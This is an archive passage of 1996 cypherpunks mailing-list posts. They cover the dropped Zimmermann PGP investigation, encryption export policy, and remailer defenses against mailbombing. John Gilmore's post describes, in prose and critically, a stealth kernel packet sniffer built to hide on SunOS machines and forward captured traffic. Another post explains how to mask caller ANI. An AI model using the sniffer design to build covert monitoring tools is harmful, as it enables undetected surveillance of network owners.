tabulate the last few thousand hashes, and simply discard any messages
with a duplicate hash.  The target of the attack would receive only
the first copy of the message.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 13 Jan 1996 06:47:44 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601122220.XAA06261@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:
>   ...and I'm sure they'll be watching VERY closely to see how
>version 3.0 will be distributed....

John Young wrote:
>AUSA William Keane in today's WSJ:
>
>      "This decision shouldn't be interpreted as meaning
>      anything. I caution people against concluding the
>      Internet is now free for export."

Alex Strasheim wrote:

>The government's policy doesn't prevent crypto from spreading around the
>world, but it does discourage a lot of people from distributing code 
>they've written or modified.  That's the point of the policy, and from 
>their point of view it's probably a big success.


  My sentiments <expanded upon> exactly.  I tend to disbelieve in
coincidences.  Rather, I found the timing of dropping the investigation
of PRZ and the anticipated release of version 3.0 extremely interesting.
One might conclude that their attitude was: "Let's throw this fish back
and aim for a 'keeper'.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 13 Jan 1996 01:35:56 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Shimomura on BPF
In-Reply-To: <199601120029.TAA28014@pipe3.nyc.pipeline.com>
Message-ID: <199601121223.XAA04718@suburbia.net>
MIME-Version: 1.0
Content-Type: text


>    Shimomura on BPF, NSA and Crypto:
> 
>    One of the tools I modified for my work was a sophisticated
>    piece of software called the Berkeley Packet Filter. ...
>    Unlike the original BPF, my version was designed to bury
     ^^^^^^^^^^^^^^^^^^^^^^^
>    itself inside the operating system of a computer and watch
>    for certain information as it flowed through the computer
>    from the Internet. When a packet from a certain address, or
>    for that matter any other desired piece of information
>    designated by the user flashed by, BPF would grab it and
>    place it in a file where it could be kept for later
>    viewing.

This is *exactly* what BPF does, always did and was designed to do. As
for writing the packets to a file, everything but opening and closing
the file are described in the man page. You could code it in 10 lines.

+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 13 Jan 1996 08:12:09 +0800
To: abostick@netcom.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <30f6ef04.32298803@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996 22:25:53 GMT, I wrote:

> The remailer could calculate a hash for the body of each encrypted
> message received (the same portion which will be decrypted by PGP),
> tabulate the last few thousand hashes, and simply discard any messages
> with a duplicate hash.  The target of the attack would receive only
> the first copy of the message.

To refine this a bit further, the hash need not cover the entire
message.  It could be sped up a bit by restricting it to the header
containing the encrypted session key.  Since the session key is
selected randomly, that header (and its hash) should be unique for
every message.

The hash values could also be retained for a fixed period of time --
perhaps 23 hours -- following the most recent receipt of a given hash.
Thus a message could be repeated by the legitimate sender after a
delay of 24 hours, and would be forwarded.  The original sender could
re-encrypt the message (thus changing its hash) earlier than that, and
it would be properly forwarded.  A canned message on the other hand,
being sent from multiple locations, would likely be received more
often than this and not forwarded after the first time, even if each
sender only sent it once a day.

You could even penalize messages for which you've received massive
dupes, by extending the hash retention time by, say, 12 hours for each
dupe received.  If you got a message 100 times in one day, you'd
refuse to forward any duplicates for nearly 2 months.  This would take
care of those on vacation at the time of the original attack, and
those with very slow news feeds.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Dubois" <dubois@dubois.com>
Date: Sat, 13 Jan 1996 14:45:05 +0800
To: cypherpunks@toad.com
Subject: News Release
Message-ID: <199601130542.WAA06898@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Yesterday morning, I received word from Assistant U.S. Attorney William 
Keane in San Jose, California, that the government's three-year 
investigation of Philip Zimmermann is over.  Here is the text of Mr. 
Keane's letter to me:

"The U.S. Attorney's Office for the Northern District of California has 
decided that your client, Philip Zimmermann, will not be prosecuted in 
connection with the posting to USENET in June 1991 of the encryption 
program Pretty Good Privacy.  The investigation is closed."


The U.S. Attorney also released this to the press:

"Michael J. Yamaguchi, United States Attorney for the Northern District 
of California, announced today that his office has declined prosecution 
of any individuals in connection with the posting to USENET in June 1991 
of the encryption program known as "Pretty Good Privacy."  The 
investigation has been closed.  No further comment will be made by the 
U.S. Attorney's Office on the reasons for declination.

Assistant U.S. Attorney William P. Keane of the U.S. Attorney's Office in 
San Jose at (408) 535-5053 oversaw the government's investigation of the 
case."


On receiving this news, Mr. Zimmermann posted this to the Cypherpunks 
list:

- -----BEGIN PGP SIGNED MESSAGE-----

My lead defense lawyer, Phil Dubois, received a fax this morning from
the Assistant US Attorney in Northern District of California, William
Keane.  The letter informed us that I "will not be prosecuted in 
connection with the posting to USENET in June 1991 of the encryption 
program Pretty Good Privacy.  The investigation is closed."

This brings to a close a criminal investigation that has spanned the
last three years.  I'd like to thank all the people who helped us in
this case, especially all the donors to my legal defense fund.  
Apparently, the money was well-spent.  And I'd like to thank my very 
capable defense team:  Phil Dubois, Ken Bass, Eben Moglen, Curt Karnow, 
Tom Nolan, and Bob Corn-Revere.  Most of the time they spent on the case 
was pro-bono.  I'd also like to thank Joe Burton, counsel for the co-
defendant.

There are many others I can thank, but I don't have the presence of mind
to list them all here at this moment.  The medium of email cannot express
how I feel about this turn of events.


  -Philip Zimmermann
   11 Jan 96

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPDy4WV5hLjHqWbdAQEqYwQAm+o313Cm2ebAsMiPIwmd1WwnkPXEaYe9
pGR5ja8BKSZQi4TAEQOQwQJaghI8QqZFdcctVYLm569I1/8ah0qyJ+4fOfUiAMda
Sa2nvJR7pnr6EXrUFe1QoSauCASP/QRYcKgB5vaaOOuxyXnQfdK39AqaKy8lPYbw
MfUiYaMREu4=
=9CJW
- -----END PGP SIGNATURE-----


I'd like to add a few words to those of my client.

First, I thank Mr. Keane for his professionalism in notifying us of the 
government's decision.  It has become common practice for federal 
prosecutors to refuse to tell targets of investigations that the 
government has decided not to prosecute.  I appreciate Mr. Keane's 
courtesy.

Let me add my thanks to the other members of the defense team-- Ken Bass 
in Washington D.C. (kbass@venable.com), Curt Karnow in San Francisco 
(karnow@cup.portal.com), Eben Moglen in New York (em21@columbia.edu), and 
Tom Nolan in Palo Alto (74242.2723@compuserve.com).  Bob Corn-Revere in 
D.C. (rcr@dc1.hhlaw.com) was a great help on First Amendment issues.  
These lawyers are heroes.  They donated hundreds of hours of time to this 
cause.  Each is outstanding in his field and made a contribution that 
nobody else could have made.  It has been an honor and a privilege to 
work with these gentlemen.

Mr. Zimmermann mentioned a lawyer named Joe Burton (joebur@aol.com) of 
San Francisco.  Mr. Burton deserves special mention.  He represented 
another person who was under investigation.  To have made this other 
person publicly known would have been an invasion of privacy, so we 
didn't.  We still won't, but we can finally acknowledge Mr. Burton's 
enormous contribution.  Whether we were getting paid or not, the rest of 
us at least received some public attention for representing Phil 
Zimmermann.  Mr. Burton labored quietly on behalf of his client.  He took 
the case pro bono and did an extraordinary job.  He is a lawyer who 
exemplifies the finest traditions of the Bar and the highest standard of 
integrity.  I am proud to know Joe Burton.

The warriors at the Electronic Privacy Information Center (EPIC)-- Marc 
Rotenberg, David Sobel, and David Banisar-- and at the Electronic 
Frontier Foundation (EFF), Computer Professionals for Social 
Responsibility (CPSR), and the American Civil Liberties Union (ACLU) 
provided financial, legal, and moral support and kept the public 
informed.  They continue to do so, and we all owe them thanks for it.

Those members of the press who recognized the importance of this story 
and told the world about it should be commended.  Undeterred by the 
absence of sex and violence, these reporters discussed the real issues 
and in so doing served the public well.

Many other people, lawyers and humans alike, made invaluable 
contributions.  My assistants Alicia Alpenfels, Suzanne Turnbull Paulman, 
and Denise Douglas and my investigator Eli Nixon kept us organized.  Rich 
Mintz, Tom Feegel, and Nathaniel Borenstein of First Virtual put up a Web 
site and aggressively supported the Zimmermann Legal Defense Fund.  
Another site was built by Michael Sattler of San Francisco, and he and 
Dave Del Torto (also of S.F.) let me stay in their homes.  Thanks also to 
MIT and The MIT Press:  Hal Abelson, Jeff Schiller, Brian LaMacchia, 
Derek Atkins, Jim Bruce, David Litster, Bob Prior, and Terry Ehling.  And 
there were many others.

Finally, I offer my thanks to everyone who contributed to the Zimmermann 
Legal Defense Fund.  People all over the world gave their hard-earned 
money to support not only Phil Zimmermann's defense but also the cause of 
privacy.  It is impossible to be too pessimistic about our future when 
there are so many of you.

Now, some words about the case and the future.  Nobody should conclude 
that it is now legal to export cryptographic software.  It isn't.  The 
law may change, but for now, you'll probably be prosecuted if you break 
it.  People wonder why the government declined prosecution, especially 
since the government isn't saying.  One perfectly good reason might be 
that Mr. Zimmermann did not break the law.  (This is not always a 
deterrent to indictment.  Sometimes the government isn't sure whether 
someone's conduct is illegal and so prosecutes that person to find out.)  
Another might be that the government did not want to risk a judicial 
finding that posting cryptographic software on a site in the U.S., even 
if it's an Internet site, is not an "export".  There was also the risk 
that the export-control law would be declared unconstitutional.  Perhaps 
the government did not want to get into a public argument about some 
important policy issues:  should it be illegal to export cryptographic 
software?  Should U.S. citizens have access to technology that permits 
private communication?  And ultimately, do U.S. citizens have the right 
to communicate in absolute privacy?  

There are forces at work that will, if unresisted, take from us our 
liberties.  There always will be.  But at least in the United States, our 
rights are not so much stolen from us as they are simply lost by us.  The 
price of freedom is not only vigilance but also participation.  Those 
folks I mention in this message have participated and no doubt will 
continue.  My thanks, and the thanks of Philip Zimmermann, to each of 
you.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPdHw7Z7C+AHeDONAQFR+QP/SJFD1DsIqUZhl5s8dtnUfe8l5a0YAWsa
jOGvaK6gNpi1L4McEkb8Y4hOlI4n+X8HuRnzHai0UmSjAT6zHQmfN9UVbP27fYBR
xKw1nTzEziHsbmHTua+fDvsWrsWa+A5hBxS7UAQkepDWtlc2EUCB1v5aOyGwnuco
ppXLLSDHh1g=
=N8iF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 13 Jan 1996 14:23:51 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: PRZ grand jury - how about free accts for them...
In-Reply-To: <Pine.SUN.3.91.960112171657.9502I-100000@viper.law.miami.edu>
Message-ID: <Pine.BSF.3.91.960113001936.5205C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996, Michael Froomkin wrote:

> sounds like jury tampering to me.  a good way to go to jail quickly.

Probably not, especially once the grand jury's term has expired.  What 
the non-lawyers must realize, however, is that (in most cases) relatively 
little of a "grand jury investigation" is conducted before the grand 
jury.  It varies from case to case, and prosecutor to prosecutor, but 
gathering records using grand jury subpoenas (and reporting to the GJ 
that the records have been obtained), interviewing witnesses outside the 
GJ (and eventually summarizing the information when presenting a proposed 
indictment for consideration), is much more common.

There are various reasons for this:  minimize the inconvenience to the 
members of the grand jury (if they had to hear every witness, productive 
or otherwise ...), limited available grand jury time, unnecessary 
creation of Jencks Act material (testimony of trial witnesses which must 
be turned over to the defense), and simple lack of time.  Know that 
agents cannot be present in the GJ except when they are testifying (and 
only one witness is allowed at a time).

I, for example, have about 40 investigations going on for which I bear at 
least some responsibility.  Most are conducted by the agents until they 
present the case to me for a final decision on whether to present a 
proposed indictment.

Certain cases, of course, I am more involved in, and I would guess that 
the Mitnick investigation was one.  But being more involved almost 
certainly doesn't mean bringing *every* witness to testify before the 
GJ.  So even if a grand juror told you everything that went on in a 
particular case, you would not know everything the 
investigators/prosecutors know.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 13 Jan 1996 09:22:24 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <2.2.32.19960113002203.00906fc0@mail.teleport.com>
Message-ID: <30f70156.4588701@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jan 1996 16:22:03 -0800, Alan Olsen wrote:

> At 10:25 PM 1/12/96 GMT, John Lull wrote:
> >On Fri, 12 Jan 1996 10:55:12 -0800, you wrote:
> >
> >> Cypherpunks:  is there any way to respond to, or prevent, this sort of
> >> attack short of actually shutting down the remailer?  
> >
> >Yes, very simply.
> >
> >The remailer could calculate a hash for the body of each encrypted
> >message received (the same portion which will be decrypted by PGP),
> >tabulate the last few thousand hashes, and simply discard any messages
> >with a duplicate hash.  The target of the attack would receive only
> >the first copy of the message.
> 
> I am afraid it is not that simple.  Remember that the mailbombing consists
> of many, many horny little geeks responding to a single message.  They are
> replying to the same message (and probibly adding a few "me too!" lines),
> not mailing the same one over and over again.

The specific attack referred to had an entire encrypted message, not
just a reply block.  Obviously this solution does not work if only a
reply block is encrypted.

> Another idea would be to keep a md5 (or other) hash list of the reply block
> used and have a disabled list for such spam attacks.  (Unfortunatly this
> requires code, thus time.)

Even worse, it requires manual intervention for each attack unless you
are willing to add reply blocks to the list based simply on the volume
of messages using that reply block.  That could prevent the remailer
network being overwhelmed, but is not likely to be seen as adequate by
the target, who would likely still see the first several dozen
messages before the specified threshold was reached.

There is another related solution for the attack using just a reply
block, however.  The final remailer could collect messages either
using a given reply block, or addressed to a given address, if more
that a few were received in a relatively short period of time.  It
could then forward the first half-dozen or so, along with a note that
another X thousand messages were waiting, and asking if the intended
recipient wanted them forwarded or trashed.

Unfortunately this would not prevent the remailer network from being
overwhelmed.  Perhaps some combination of these solutions would be
required -- rationing based on the reply block at each remailer, and
collection & recipient notification at the final remailer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Sun, 14 Jan 1996 00:45:48 +0800
To: cypherpunks@toad.com
Subject: Re: Mail to news gateways
In-Reply-To: <2.2.32.19960113011131.006dc0e0@limestone.kosone.com>
Message-ID: <ML-2.0.821522593.7349.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> At 11:35 AM 1/12/96 -0800, you wrote:
> >
> >Could someone point me to a _current_ list of mail to news gateways?
> >
> 
> >From ethe help file for Private Idaho 2.6b:
> 
> You can get the most current USENET gateway information (as well as
> additional remailer info such as PGP keys) by:
> 
>      E-mailing mg5n+remailers@andrew.cmu.edu
>      (no subject or text in the message body required)


I maintain a list that I believe to be more accurate than anything else out
there. It's at http://students.cs.byu.edu/~don/mail2news.html. It's also
linked from yahoo if you search for cypherpunk, gateway, mail, or news, or
something like those.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 13 Jan 1996 18:09:40 +0800
To: gnu@toad.com
Subject: Re: Shimomura on BPF, NSA and Crypto
Message-ID: <9601130957.AA19298@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tsutomu says the NSA is inept rather than inherently evil.  I think he
concluded this because they declined to fund his work.  An ept and
evil NSA would want Tsutomu on the payroll.

Tsutomu's stealth version of the Berkeley packet filter did a lot more
than modload into the kernel.  He was paid by the Air Force to design
one that could patch itself into SunOS kernels invisibly, even into
kernels with no modload support at all.  It had special code that
would search through the kernel binary for references to the address
of the Ethernet chip, and patch itself in during the very low level
interrupt handling.  It was highly optimized so it wouldn't show up by
loading down the machine, and it did things like decrement the
interrupt counter so that even the extra interrupts caused by running
the Ethernet chip in 'receive every packet on the wire' mode wouldn't
be visible.  He talked about enhancements that would automatically
forward packets of interest back out onto the Internet, so the whole
shebang would hide in kernel memory, never visible to users, never
running any processes or altering any files.  Think of it as Digital
Telephony wiretap technology for the Internet.

The idea was to design something that you could run on a machine
without the owner ever finding out about it.  To break into that
person's network.  It's a tool customized for crackers.  It's one
of the tools that Mitnick was after when he broke into Tsutomu's
machine.

Tsutomu actually wrote and ran this stealth BPF code (as well as
designing it) and got into a tiff with the Air Force.  They wanted the
code, not just the design paper they'd commissioned.  He countered by
offering to post the code to the net, with a copyright that let anyone
EXCEPT the government use it, if they wouldn't pay him for the paper.
I don't know how the situation was eventually resolved.

Tsutomu has lots of glib rhetoric about how he just builds tools and
they can be used for good or evil.  This tool is custom-designed for
evil.  Maybe in wartime the Air Force will want to inflict evil on an
opponent.  Or maybe instead they'll pass it to a latter-day J. Edgar
Hoover.  Either way, it's evil.  It doesn't become good when you
inflict it on someone you dislike.
-- 
John Gilmore                                    gnu@toad.com  --  gnu@eff.org
        Don't introduce that Tsutomu to your girlfriend.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sudduth, Larry" <SudduthLM@SecureC2.com>
Date: Sat, 13 Jan 1996 16:14:37 +0800
To: "'CypherPunks'" <rainbird@smartlink.net>
Subject: Reach out! Update 01  (CypherPurists trash this)
Message-ID: <c=US%a=_%p=SecureC2%l=Private_MDB-960113072328Z-9@sc2>
MIME-Version: 1.0
Content-Type: text/plain


(I know this is way off topic, but I wanted to apologize to all anyway for
my last posting with the RTF crap in it.  I tried unsuccessfully to correct 

the RTF problem as a result of previous list discourse, and fervently
believe that it is fixed now.  If not, I guess I'll find out about it.
 Anyway, thanks for your forbearance, and now for some noise.)

The merchant must have been so impressed by the pent-up market demand for
the "How to Beat and Kill Your Ex-Wife and an Unlucky Innocent  . . .  And
Get Away With It" video, that the ordering procedure has been changed to a
toll number.  I'm sure the merchant desires potential customers to call
collect, after all who in the world  would pay money for the privilege of
buying a product?  I believe the new number is 0-818-879-0614, remember to
say "operator" when prompted, so you can request a collect call.  I have up 

to now always been greeted by a busy signal, so fear that I could have to
validate the above number by calling the toll-free number (see original
noise below) again.

If one wants to directly dial the toll number, one can suppress one's phone 

number from being reported to the merchant via Caller ID by dialing *67
prior to the call, at least here in Bell Atlantic land.  Check with your
telco to be sure.  (Interstate support for Caller ID is currently spotty so 

this could be a non-issue.)  This strategy should be employed if one is
leery of being on the receiving end of future direct mail campaigns
offering products similar to the "How to Beat and Kill Your Ex-Wife and an
Unlucky Innocent  . . .  And Get Away With It" video, just for discussing
the particulars of the video with one of the merchant's staff.  Direct mail 

campaigns target people who've previously inquired (and not necessarily
bought) by phone.  As an aside, I know y'all knew that your number (i.e.,
the number dialed from) is always reported to the recipient at an 800
number, and that this cannot be suppressed.

After calling the toll-free number several times, I was able to write down
the new telephone number for ordering the "How to Beat and Kill Your
Ex-Wife and an Unlucky Innocent  . . .  And Get Away With It" video.  It
took several attempts because I kept encountering pens with no ink in them
in my desk.  The recording doesn't really describe the video at all, just
refers to the oh-jay video.  I haven't heard the actual title of the video, 

since I couldn't get through to a human at the merchant's telephone number. 

 Since calling it the oh-jay video sounded so darned impersonal, I took a
stab at a seemingly appropriate title.


>William T. Rainbird wrote January 12, 1996 2:12 AM
>I know this isn't a typical posting for this group, but I thought I'd
>point out that O.J. Simpson has a video for sale, to further exploit his
carnage.
>You can buy it by dialing 1-800-OJTELLS 1-800-658-3557 it is a FREE CALL
>(for you).  I guess that means the MERCHANT PAYS for the calls, even if
>NOTHING IS ORDERED...
>
>Please repost and tell your friends!


-=-=-=-=-=-=-=-=-=-=-=-=-=
SudduthLM@SecureC2.com
The views expressed herein are the personal views of the author only, etc.


y, etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 13 Jan 1996 23:18:48 +0800
To: cypherpunks@toad.com
Subject: ITAR Re-write ?
Message-ID: <Pine.BSD.3.91.960113045757.2803B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  Bloomberg, the business news agency, reports 01 12 96: 
 
     The U.S. Commerce Department will recommend easing 
     export controls on encryption software after a study by 
     the department and the National Security Agency found 
     that American firms are being hurt.... 
 
     The report's release came on the same day federal pro- 
     secutors dropped a three-year investigation...of...Philip 
     Zimmerman.... 
 
     The government study comes a week after [the Computer 
     Systems Policy Project] released [its] own study showing 
     ...American companies will lose [maybe $60 billion] in 
     U.S. computer system sales expected in 2000.... 
 
 
  The 13-member Project 
 
     ...includes International Business Machines...and AT&T.... 
 
 
  Perhaps the let-go of Zimmerman is less a triumph of right 
  than of might? 
 
  But economic might is not the only kind of might: 
 
     [Easing export controls] may pit Brown's department a- 
     gainst U.S. defense and spy agencies.... 
 
 
  So... 
 
     [Commerce Secretary] Brown said his department will pre- 
     pare recommendations for easing [ITAR] controls that 
     should be forwarded to the president "within a few months." 
 
 
  Meaning: the 13 Project members should be prepared to pay 
  through the nose in the runup to the '96 gala. 
 
  And just so they get the big picture: 
 
     It's unclear if the NSA, the super-secret eavesdropping 
     agency, endorsed the Commerce Department's conclusions 
     in the report it jointly prepared. 
 
 
  The newsstory reports 
 
     ...federal prosecutors dropped [the Zimmerman] investiga- 
     tion without explanation.... 
 
 
  No explanation's required.  One hostage was released.  13 
  others were taken.  But the one release does afford the new 
  hostages, who have deep pockets, some hope... 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's headline?  COMMERCE'S BROWN 
  PROPOSES REWRITE OF ENCRYPTION EXPORT CONTROLS. 
  Its dateline?  WASHINGTON (Jan 12, 1996 5:34 p.m. EST). 
  Its Nando News online filename?  biz6_1893.html 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 14 Jan 1996 00:48:43 +0800
To: cypherpunks@toad.com
Subject: Fwd: Scrambled software gets an OK
Message-ID: <199601131630.IAA20078@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



This was printed in the San Jose Mercury News this morning.  I'd have
just posted a pointer to it, except that it was in the "private" part of
their web pages...




Scrambled software gets an OK

-- Exports: Foreign encoding unfair to U.S. firms, Commerce Department says.

Bloomberg Business News

WASHINGTON -- The Commerce Department will recommend easing export controls
on encryption software after a study by the department and the National
Security Agency found the restrictions are hurting U.S. firms, Commerce
Secretary Ron Brown said.

Such a move may pit Brown's department against U.S. defense and spy agencies,
however, setting the stage for a White House battle over one of the last
computer technologies still covered by export controls.

``I'm interested in promoting American exports,'' Brown said.

``If your foreign competitors are exporting products with encryption
capability and you are not, that puts you at a tremendous competitive
disadvantage,'' he said.

Encryption software turns information, such as files and credit card numbers,
into indecipherable material that can be sent across networks without fear
of tampering to the recipient, who can then unscramble it. Under current
U.S. law, encryption technology that exceeds certain technical thresholds
is considered a ``munition.'' Those who would export such technology need
explicit permission from the government.

The United States justifies the export restrictions by saying law-enforcement
agencies would be hamstrung in their efforts to stop terrorists, spies and
criminals without them.

The computer industry counters that encryption software is available from
other countries, and the restrictions simply rob U.S. companies of business.

The Computer Systems Policy Project, a joint effort of 13 top technology
companies released its own study showing that U.S. companies will
lose as much as 30 percent of the $200 billion in U.S. computer system
sales expected in 2000 because of federal laws limiting exports of
encryption products.

Brown said his department will prepare recommendations for easing those
controls that should be forwarded to the president ``within a few months.''

It's unclear if the NSA endorsed the Commerce Department's conclusions in
the report it jointly prepared. Representatives of the NSA were unavailable
for comment.

Brown's assertion comes a day after federal prosecutors dropped a three-year
investigation of Boulder, Colo., software designer Philip Zimmermann, whose
encryption program called Pretty Good Privacy was posted on the Internet,
the worldwide computer network.

Published 1/13/96 in the San Jose Mercury News.
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sat, 13 Jan 1996 23:22:11 +0800
To: SudduthLM@SecureC2.com
Subject: Re: Reach out! Update 01  (CypherPurists trash this)
Message-ID: <199601131511.PAA06506@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


Regarding the *67 feature to disable Caller ID:
This does not stop your ANI information from travelling with your
call.  It just sets the "privacy bit" to on.  So standard
consumer-grade Caller ID systems won't see your number.  But if the
user on the other end is receiving your call over a T1, they can use a
Dialogic voice processing card to yield your ANI, even with the
privacy bit set.
	A *much* better way to do this is the following:
Dial the Operator.
Ask him/her to dial the 800 number for you.

This will result in your ANI being (000) 000-5555 (or at least that's
what it does in Bell Atlantic land).  I tested this a couple months
ago using AT&T's 1-800-MY-ANI-IS service.  I directly dialed
1-800-MY-ANI-IS and it read back my phone number.  Then I had the
operator dial it for me and got (000) 000-5555.  This service doesn't
work anymore, YMMV.
						Dan
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the
Universe
***************************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 14 Jan 1996 02:37:12 +0800
To: shamrock@netcom.com
Subject: Re: Digital postage and remailer abuse (was Re: Novel use of Usenet and remailersto mailbomb from luzskru@cpcnet.com)
Message-ID: <ad1d37dc2a0210049f07@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:47 PM 1/13/96, Alan Bostick wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <v02120d02ad1ce02500bc@[192.0.2.1]>,
>shamrock@netcom.com (Lucky Green) wrote:
>
>> I am not sure that postage would solve this problem. The geeks would
>> individually pay for it. Still, nominal postage would solve a lot of the
>> problems that plague remailnet.
>
>Maybe I'm misunderstanding how using digital postage with remailers would
>work.  I was assuming that the postage stamp would be included *inside*
>the encrypted envelope, that what the remailer would do on receipt of
>mail would be: (a) decrypt the envelope; (b) validate the postage stamp;
>and (if the stamp is valid) (c) forward the message according to the
>now-decryped instructions.

The basic idea of digital postage means, as Lucky said, that individual
users and individual messages would have their own stamps. (Being just
numbers, it is certainly possible that multiple messages could have the
same exact "stamp," but then only one of them would be valid...in the model
I usually think in terms of, the first to "redeem" the stamp gets the
money, all others get nothing.)

So, each transmitter of a message would have to "pay the freight" with his
own stamp. The idea of N different messages all carrying the "same" stamp
is inconsistent with how digital postage would operate in practice.


>Using this model, if the perpetrator doesn't include a postage stamp,
>then the message is ignored.  If the perp includes a stamp, the first
>horny net geek's message is relayed but subsequent ones get bounced for
>invalid postage.

Yes.

>If the message requires external postage (remailer processing cycle is
>process postage *before* decrypting envelope), then at the very least
>the horny net geeks have to get their own postage stamps, putting a step
>in the way of instant gratification.  What's more, doing this would
>require *some* understanding of how the remailer network operates.  One
>should never underestimate the degree of cluelessness present on the
>net, but knowing how to use remailers makes it more likely that somebody
>could recognize this as a mailbomb rather than a legitimate offer.

Yes.


>The very nature of this attack makes me wonder whether it would be
>worthwhile to implement a digital postage scheme for remailers that
>doesn't happen to be backed by real money.  The remailers would continue
>to be free to use, and currency exchange hassles would be avoided, but
>many of the benefits of abuse prevention would be in place.  So would
>the infrastructure to upgrade to pay-to-play remailers at a later date.

I think someone tried this a couple of years ago, offering coupons for
remailer use.

The idea of "coupons" acting as stamps is the one most often discussed as
an alternative to having full convertability to money. A person buys a
block of numbers, each can be used once and only once. It's up to the user
not to let the numbers out of his possession (as they can be used by
whoever gets them).

So long as the numbers are in the outer encrypted envelope, packet sniffers
and sysadmins won't see them.

So long as the remailer operator is honest enough not to claim the numbers
have already been used--a reasonable assumption, at least at this
time--then this should work.

Coupons also get around laws about cash, banking, etc.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 14 Jan 1996 02:25:50 +0800
To: cypherpunks@toad.com
Subject: Re: Digital postage and remailer abuse
Message-ID: <2.2.32.19960113061303.0068e1f8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Thus bespoke Alan Bostick:
>
>The very nature of this attack makes me wonder whether it would be
>worthwhile to implement a digital postage scheme for remailers that
>doesn't happen to be backed by real money.  The remailers would continue
>to be free to use, and currency exchange hassles would be avoided, but
>many of the benefits of abuse prevention would be in place.  So would
>the infrastructure to upgrade to pay-to-play remailers at a later date.

Doing something like this might also further the analogy of email to
snailmail; particularly if the remailers were able to issue 'books' of stamps.
It might even be possible to have each remailer issue Estamps (tm) of
different 'kinds', much as there are different postage stamp 'themes'.
Having different stamps from each remailer would also allow some means of
tracking spammers and rip-off artists ("hmmm. an 'Elvis' Estamp. That came
from hactic; let's see if they can tell us who they sold this book to.....")
IF the nature of the offense were sever enough.

Too, Estamp-based remailers would be a start on reputation basing: if the
email goes through a postage-based remailer, there will eventually be an
increased level of confidence that it isn't some kind of scam or other
nuisance ("This came through vox, a postage remailer; therefore, someone had
to go through some degree of bother; therefore, it's a lot less likely that
it's some Frosh playing with his new Internet toy.").

Of course, I could be just spitting into the wind, or posting what is
blatantly obvious to everyone else :-)

Dave Merriman


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

